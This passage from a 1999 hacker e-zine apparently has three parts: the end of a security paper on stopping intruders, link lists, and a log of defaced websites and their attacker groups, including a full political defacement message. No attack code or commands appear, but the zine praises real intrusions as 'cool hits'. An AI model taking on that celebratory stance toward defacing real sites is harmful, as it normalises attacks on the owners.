to his mail via NFS exports or the guest account. You know how it is, like
the mechanic that always has a broken car, or the plumber that has the
broken sink, the security expert usually has an open machine.)

Step 9. Here is the hard part is to try to convince these security experts
that they are not so above the average citizen and that by now giving out
their unknown (except for the uebercrackers) security bugs, it would be a
service to Internet. They do not have to post it on Usenet, but share
among many other trusted people and hopefully fixes will come about and
new pressure will be applied to vendors to come out with patches.

Step 10. If you have gained the confidence of enough security experts,
you will know be a looked upto as an elite security administrator that is
able to stop most uebercrackers. The final true test for being a ueberadmin
is to compile a IRC client, go onto #hack and log all the bragging and
help catch the uebercrackers. If a uebercracker does get into your system,
and he has used a new method you have never seen, you can probably tell
your other security admins and get half of the replies like - "That bug
been known for years, there just isn't any patches for it yet. Here's my
fix."
and the other half of the replies will be like - "Wow. That is very
impressive. You have just moved up a big notch in my security circle."

VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups
mention anything about that security hole, Flame him for discussing it
since it could bring down Internet and all Uebercrackers will now have it
and the million other reasons to keep everything secret about security.


Well, this paper has shown the finer details of security on Internet. It has
shown both sides of the coin. Three points I would like to make that would
probably clean up most of the security problems on Internet are as the
following:

1. Vendors need to make security a little higher than zero in priority.
If most vendors shipped their Unixes already secure with most known bugs
that have been floating around since the Internet Worm (6 years ago) fixed
and patched, then most uebercrackers would be stuck as new machines get
added to Internet. (I believe Uebercracker is german for "lame copy-cat
that can get root with 3 year old bugs."
) An interesting note is that
if you probably check the mail alias for "security@vendor.com", you will
find it points to /dev/null. Maybe with enough mail, it will overfill
/dev/null. (Look in manual if confused.)

2. Security experts giving up the attitude that they are above the normal
Internet user and try to give out information that could lead to pressure
by other admins to vendors to come out with fixes and patches. Most
security experts probably don't realize how far their information has
already spread.

3. And probably one of the more important points is just following the
steps I have outlined for Stopping a Uebercracker.


Resources for Security:
Many security advisories are available from anonymous ftp cert.org.
Ask archie to find tcp_wrapper, security programs. For more information
about ISS (Internet Security Scanner), email cklaus@shadow.net.


Acknowledgements:

Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott
Miles, Scott Yelich, and Henri De Valois.


Copyright:

This paper is Copyright 1993, 1994. Please distribute to only trusted
people. If you modify, alter, disassemble, reassemble, re-engineer or have
any suggestions or comments, please send them to:

cklaus@shadow.net






@HWA



SITE.1

#1 http://whitehats.com/

This is a newish security site (at least its new to me) that has many IDS signatures
online for download for use with SNORT (a gnu IDS tool) also a good discussion on the
NMAP tool's ability to scan undetected by the target host (see #58). - Ed



#2 http://www.immortalz.com/

New security site reborn with a new layout will be up within a week, check it out ...
soon to mirror the HWA zine too. ;-)




@HWA



H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)


Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...



Latest cracked pages courtesy of attrition.org



[99.08.23] NT [ ] MediaMark (www.mediamark.com)
[99.08.23] So [bl0w team] Thinking Pictures, Inc. (www.thinkpix.com)
[99.08.23] So [bl0w team] Rock.com's Rolling Stone's Web site (www.stones.com)
[99.08.23] NT [v00d00] Odin Radiators (www.odinradiators.com.au)
[99.08.23] BI [team_hM] Monica Lewinsky's site (www.monicalewinsky.com)

[99.08.23] NT [139_r00ted] Concept Reseau (www.concept-reseau.fr)
[99.08.23] Li [Uneek Tech] Ruchi Group (www.ruchigroup.com)
[99.08.23] NT [139_r00ted] Phoenix Data Systems (www.phoenixds.at)

[99.08.23] NT [139_r00ted] Concept Reseau (www.concept-reseau.fr)
[99.08.23] Li [Uneek Tech] Ruchi Group (www.ruchigroup.com)
[99.08.23] NT [139_r00ted] Phoenix Data Systems (www.phoenixds.at)

[99.08.25] NT [wkD] PC Guk (www.pcguk.com)
[99.08.25] [DISO] Nullsoft SHOUTcast (yp.shoutcast.com)
[99.08.24] Ir [Uneek Tech] Aston Packaging (www.astonpackaging.co.uk)
[99.08.24] Ir [Uneek Tech] All Art (www.allart.co.uk)
[99.08.24] NT [ ] 1st Stop Inc (www.1ststopinc.com)
[99.08.24] NT [139_r00ted] Scanres (SE) (www.scanres.se)
[99.08.24] Li [GOD] #2 Madison Square Garden (www.thegarden.com)


[99.08.26] [HwC] M Zipper (www.zipper.de)
[99.08.26] NT [aL3X] M Cindy Jackson (www.cindyjackson.co.uk)
[99.08.26] Li [stormtrooper] Red Hat Indonesia (www.redhat.or.id)
[99.08.26] Fb [ ] No Such Agency (www.nsa.org)
[99.08.26] NT [Fuby] CyberElf (www.cyberelf.com)
[99.08.26] Fb [ ] Official Web site of Limp Bizkit
(www.limpbizkit.com)
[99.08.26] So [ ] Cornell Theory Center
(cedar.tc.cornell.edu)
[99.08.26] [wkD] M Lookie Here (lookiehere.com)
[99.08.26] [ ] OE Pages (www.oe-pages.com)
[99.08.26] NT [cynic] Peter Mueller's Web Site
(www.petermueller.com)
[99.08.26] NT [v00d00] WoodSBC (www.woodsbc.com.au)
[99.08.25] [ ] TLM (www.tlm.com.br)
[99.08.25] NT [139_r00ted] M IT Media Design (www.itmediadesign.com)
[99.08.25] NT [Uneek Tech] Tomrods LTD Steel Stockholders (www.tomrods.co.uk)
[99.08.25] Ir [Uneek Tech] Sescoi (www.sescoi.co.uk)
[99.08.25] NT [Uneek Tech] Litho Supplies (www.litho.co.uk)



[99.08.26] [HwC] M Zipper (www.zipper.de)
[99.08.26] NT [aL3X] M Cindy Jackson (www.cindyjackson.co.uk)
[99.08.26] Li [stormtrooper] Red Hat Indonesia (www.redhat.or.id)
[99.08.26] Fb [ ] No Such Agency (www.nsa.org)
[99.08.26] NT [Fuby] CyberElf (www.cyberelf.com)
[99.08.26] Fb [ ] Official Web site of Limp Bizkit (www.limpbizkit.com)
[99.08.26] So [ ] Cornell Theory Center (cedar.tc.cornell.edu)
[99.08.26] [wkD] M Lookie Here (lookiehere.com)
[99.08.26] [ ] OE Pages (www.oe-pages.com)
[99.08.26] NT [cynic] Peter Mueller's Web Site (www.petermueller.com)
[99.08.26] NT [v00d00] WoodSBC (www.woodsbc.com.au)
[99.08.25] [ ] TLM (www.tlm.com.br)
[99.08.25] NT [139_r00ted] M IT Media Design (www.itmediadesign.com)
[99.08.25] NT [Uneek Tech] Tomrods LTD Steel Stockholders (www.tomrods.co.uk)
[99.08.25] Ir [Uneek Tech] Sescoi (www.sescoi.co.uk)
[99.08.25] NT [Uneek Tech] Litho Supplies (www.litho.co.uk)


Defaced: http://www.cmtc.7atc.army.mil/ (7th Army Training Command, Bavaria, Germany)
By: 139_rooted
Mirror: http://www.attrition.org/mirror/attrition/mil/www.cmtc.7atc.army.mil/
OS: NT


Hacked: http://vax.mtc.irisz.hu
By: Elfoscuro
Mirror: http://www.attrition.org/mirror/attrition/hu/vax.mtc.irisz.hu/
OS: NT


Defaced: http://www.mndm.gov.on.ca
Ontario Ministry of Northern Development and Mines
By: Sarin
Mirror: http://www.attrition.org/mirror/attrition/ca/www.mndm.gov.on.ca
OS: NT


Hacked: http://www.thegarden.com (Madison Square Garden)
By: Kindred Hackers
Mirror: http://www.attrition.org/mirror/attrition/com/www.thegarden.com/
OS: Linux

Hacked: http://www.webdoctor.com
By: Sistom
Mirror: http://www.attrition.org/mirror/attrition/com/www.webdoctor.com/
OS: Linux

Hacked: http://www.uis.wayne.edu
By: Unknown
Mirror: http://www.attrition.org/mirror/attrition/edu/www.uis.wayne.edu/
OS: NT

---

Hacked: http://www.prim-nov.si
By: Mozy
Mirror: http://www.attrition.org/mirror/attrition/si/www.prim-nov.si/
OS: NT

This is the first Web defacement for the country of Slovenia. Slovenia
is surrounded by Austria to the northwest, Hungary to the northeast,
Italy to the west, and Croatia to the southeast.

More info about Slovenia here:
http://www.odci.gov/cia/publications/factbook/si.html

---

Hacked: http://vax.mtc.irisz.hu
By: Elfoscuro
Mirror: http://www.attrition.org/mirror/attrition/hu/vax.mtc.irisz.hu/
OS: NT

Hacked: http://mp3town.com
By: w4t0
Mirror: http://www.attrition.org/mirror/attrition/com/mp3town.com/
OS: Linux

Hacked: http://www.westga.edu
By: W4t0
Mirror: http://www.attrition.org/mirror/attrition/edu/www.westga.edu/
OS: Solaris


Ontario Ministry of Northern Development and Mines
(www.mndm.gov.on.ca)
Zipper (www.zipper.de)
Cindy Jackson (www.cindyjackson.co.uk)
Red Hat Indonesia (www.redhat.or.id)
No Such Agency (www.nsa.org)
CyberElf (www.cyberelf.com)
Official Web site of Limp Bizkit (www.limpbizkit.com)
Cornell Theory Center (cedar.tc.cornell.edu)
Lookie Here (lookiehere.com)
OE Pages (www.oe-pages.com)
Peter Mueller's Web Site (www.petermueller.com)
WoodSBC (www.woodsbc.com.au)
TLM (www.tlm.com.br)
IT Media Design (www.itmediadesign.com)
Tomrods LTD Steel Stockholders (www.tomrods.co.uk)
Sescoi (www.sescoi.co.uk)

The message from the Monica Lewinsky hack;

Greetings bastards.

Over the last few months, we have been lead to believe that Slobodan Milosevic , the leader of the former Yugoslavia is the worst violator of Human Rights in the
world. Well, that isn't an entirely true statement. Although Slobodan Milosevic is a huge violator of Human Rights, there is a much bigger problem in China, and it's
been going on for decades. However, the politicians of America decide to overlook their violations just because of large campaign contributions and trade value.
Since the days of the Carter administration China has been openly abusing its people. They limit how many children a family can have , and how the people can live
their lives. The Chinese government kills anyone who opposes or speaks out against it. The Chinese government defies international Human Rights laws openly and
admits to it. The Chinese government has a worse Human Rights record than Slobodan Milosevic , yet nobody questions them. Just last month , its been reported
that political prisoners in China have been subjected to sexual tortures and later executed. In fact, earlier this month, President Clinton actually had Chinese Premier
Zhu Rongji to the white house for talks on entering the World Trade Organization.Bill Clinton even said at a press confrence with China's Premier Zhu Rongji ,"We
honor China's remarkable achievements, its greater prosperity and the greater range of personal choices available to its citizens, as well as the movement toward
local democracy"
. When in fact there has been no change in China's view of human rights. The Chinese Government has placed severe restrictions on freedom of
speech, the press, assembly, association, religion, privacy, as well as worker rights. Also , China has the most favored nation trade status. All of this has a lot of
people wondering why there is a war in Yugoslavia , but none in China. However the answer to that is all too apparent , greed. It is true that Slobodan Milosevic,
and his army, are carrying out horrible acts against people. They aren't being condoned at all. But, China engages in these same activities on a much larger scale, and
just because they have money it's deemed acceptable by American political and corporate interests. Bill Clinton was eager to wage war when it would take the focus
off of his bedroom practices, but he isn't so eager to do so when it will cost him valuable campaign contributions, and who knows what else. The Chinese people
have attempted to cry out for help through The Internet and televison shows. However those caught emailing anyone outside of China are immediately imprisoned .
Chinese Internet access is limited very strictly to pro-chinese sites, the government prevents anyone inside China from viewing anything else by cutting off the outside
Internet. This is comparative to Slobodan Milosevic's use of the television to only display movies and shows which he chooses, or for him to spread political lies
about other nations. However , there is one difference between China and Yugoslavia's use of censorship. China is a valuable trade nation, so there's must be all right
, at least that's the message that is sent out by the United States Government. A lot of Human Rights are asking how these two nations , with very similar tendencies
can be treated so much differently. Perhaps if China would have been the only ones in violation around the time of the Monica Lewinsky scandal things would be
different. Or perhaps if they didn't have so many large investments in American corporations and government they would be being punished for their actions. It's
terrible that Human Rights is like a commodity , to be sold to the highest bidder. In the end it all seems to be just another example of money controlling everything.
As long as someone turns a profit, it's acceptable. But what if someone were getting right, by letting your government mistreat and abuse you? You would probably
expect someone to stand up and defend you. But how can anyone expect that if they wont extend the same courtesy to someone else? Innocent people are allowed
to be executed and persecuted just because their government can pay for it. It saddens me deeply to see that more people haven't taken a stand against the Chinese.
But most people figure that since it isn't them it doesn't really happen. They think that if it were really that bad , something would have been done about it. They don't
have the time to worry about other people. They sit back and watch the Politicians of America line their pockets with the blood of the Chinese people. It's become
more and more apparent that society has no regard for the feelings and well being of others. But what if your freedom and rights were just dollars in someone else's
pocket, and you lived as the Chinese people do. Things would probably be a little different then, at least in your eyes.




another fine message brought to you by team_hM

nEoGoD





and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________



A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/



HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/


International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed



Belgium.......: http://bewoner.dma.be/cum/

Brasil........: http://www.psynet.net/ka0z

http://www.elementais.cjb.net

Canada .......: http://www.hackcanada.com

Columbia......: http://www.cascabel.8m.com

http://www.intrusos.cjb.net

Finland ........http://hackunlimited.com/

Germany ........http://www.alldas.de/
http://www.security-news.com/

Indonesia.....: http://www.k-elektronik.org/index2.html

http://members.xoom.com/neblonica/

http://hackerlink.or.id/

Netherlands...: http://security.pine.nl/

Russia........: http://www.tsu.ru/~eugene/

Singapore.....: http://www.icepoint.com

South Africa ...http://www.hackers.co.za
http://www.hack.co.za
http://www.posthuman.za.net


Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.






.za (South Africa) sites contributed by wyzwun tnx guy...




Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.

@HWA


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]


← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT